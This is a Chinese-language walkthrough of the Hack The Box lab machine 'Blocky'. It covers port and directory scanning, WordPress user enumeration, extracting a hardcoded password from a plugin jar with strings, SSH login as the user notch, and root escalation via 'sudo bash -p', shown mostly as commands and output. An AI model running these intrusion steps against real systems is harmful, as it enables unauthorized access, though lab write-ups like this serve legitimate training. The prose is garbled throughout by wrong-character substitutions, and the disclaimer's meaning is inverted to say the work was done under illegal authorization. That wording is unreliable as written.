免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。

服务探测

┌──(rootkali)-[~/htb/Blocky]└─# nmap -sV -Pn 10.10.10.37 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 22:40 ESTNmap scan report for 10.10.10.37Host is up (0.34s latency).Not shown: 65530 filtered portsPORT      STATE  SERVICE   VERSION21/tcp    open   ftp       ProFTPD 1.3.5a22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))8192/tcp  closed sophos25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 696.03 seconds

开了ftp，ssh，http三个服务

80端口关上是一个wordpress站点

ftp端口貌似存在一个近程执行破绽

┌──(rootkali)-[~/htb/Blocky]└─# searchsploit ProFTPD 1.3.5---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                                                                                                                            |  Path---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                                                                                 | linux/remote/37262.rbProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                                                                       | linux/remote/36803.pyProFTPd 1.3.5 - File Copy                                                                                                                                                                                 | linux/remote/36742.txt---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results

把36803.py拷贝到当前目录，exp要求一个可写web目录，咱们当初还不太分明哪里是可写的，须要提高一浸透80端口

爆破目录

└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.37                                                                           _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.10.37/_21-11-29_22-50-04.txtError Log: /root/dirsearch/logs/errors-21-11-29_22-50-04.logTarget: http://10.10.10.37/[22:50:06] Starting:    [22:51:25] 301 -    0B  - /index.php  ->  http://10.10.10.37/               [22:51:29] 301 -  315B  - /javascript  ->  http://10.10.10.37/javascript/   [22:51:32] 200 -   19KB - /license.txt                                      [22:51:46] 200 -   13KB - /phpmyadmin/doc/html/index.html                   [22:51:47] 301 -  315B  - /phpmyadmin  ->  http://10.10.10.37/phpmyadmin/   [22:51:48] 200 -   10KB - /phpmyadmin/                                      [22:51:48] 301 -  312B  - /plugins  ->  http://10.10.10.37/plugins/         [22:51:48] 200 -  745B  - /plugins/                                         [22:51:49] 200 -   10KB - /phpmyadmin/index.php                             [22:51:51] 200 -    7KB - /readme.html                                                                    [22:52:11] 200 -  380B  - /wiki/                                            [22:52:11] 301 -  309B  - /wiki  ->  http://10.10.10.37/wiki/[22:52:11] 301 -  313B  - /wp-admin  ->  http://10.10.10.37/wp-admin/       [22:52:11] 200 -    1B  - /wp-admin/admin-ajax.php                          [22:52:11] 200 -    1KB - /wp-admin/install.php                             [22:52:11] 500 -    4KB - /wp-admin/setup-config.php                        [22:52:11] 200 -    0B  - /wp-config.php                                    [22:52:12] 200 -    0B  - /wp-content/                                      [22:52:12] 301 -  315B  - /wp-content  ->  http://10.10.10.37/wp-content/   [22:52:12] 500 -    0B  - /wp-content/plugins/hello.php[22:52:12] 200 -   69B  - /wp-content/plugins/akismet/akismet.php           [22:52:12] 200 -    0B  - /wp-cron.php                                      [22:52:12] 301 -  316B  - /wp-includes  ->  http://10.10.10.37/wp-includes/ [22:52:12] 200 -  965B  - /wp-content/uploads/                              [22:52:12] 500 -    0B  - /wp-includes/rss-functions.php                    [22:52:12] 200 -    2KB - /wp-login.php                                     [22:52:12] 302 -    0B  - /wp-signup.php  ->  http://10.10.10.37/wp-login.php?action=register[22:52:12] 405 -   42B  - /xmlrpc.php                                       [22:52:13] 200 -   40KB - /wp-includes/  

好几个文件夹存在目录遍历破绽。

用wpsscan枚举用户名

wpscan --url http://10.10.10.37 --enumerate u1-200

[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:17 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:00:17[i] User(s) Identified:[+] notch | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: |  Wp Json Api (Aggressive Detection) |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection) |  Login Error Messages (Aggressive Detection)[+] Notch | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)

存在一个叫notch的用户

用这个用户名爆破wp后盾，ftp，ssh,phpmyadmin无果...

初始shell

如同走入了死胡同。

于是只好在爆破的目录里看看有什么有用的货色，在/plugins/目录里找到两个能够下载的jar文件

把BlockyCore.class从BlockyCore.jar里分离出来，用strings命令查看

┌──(rootkali)-[~/htb/Blocky]└─# strings BlockyCore.class com/myfirstplugin/BlockyCorejava/lang/ObjectsqlHostLjava/lang/String;sqlUsersqlPass<init>Code        localhostroot8YsqfCTnvxAUeduzjNSXe22LineNumberTableLocalVariableTablethisLcom/myfirstplugin/BlockyCore;onServerStartonServerStoponPlayerJoinTODO get username!Welcome to the BlockyCraft!!!!!!!sendMessage'(Ljava/lang/String;Ljava/lang/String;)VusernamemessageSourceFileBlockyCore.java

如同有一个用户凭证：root:8YsqfCTnvxAUeduzjNSXe22

然而用来登录ssh和ftp都不行

而后再用下面的用户名notch登录，竟然登进去了，于是找到咱们的初始shell

┌──(rootkali)-[~/htb/Blocky]└─# ssh notch@10.10.10.37notch@10.10.10.37's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation:  https://help.ubuntu.com * Management:     https://landscape.canonical.com * Support:        https://ubuntu.com/advantage7 packages can be updated.7 updates are security updates.Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230notch@Blocky:~$ 

在home目录找到user.txt

提权

查看sudo特权

notch@Blocky:~$ sudo -l[sudo] password for notch: Matching Defaults entries for notch on Blocky:    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser notch may run the following commands on Blocky:    (ALL : ALL) ALL

能够应用所有root权限命令。。。

那就很简略了，间接提权到root

notch@Blocky:~$ sudo bash -proot@Blocky:~# iduid=0(root) gid=0(root) groups=0(root)root@Blocky:~# whoamiroot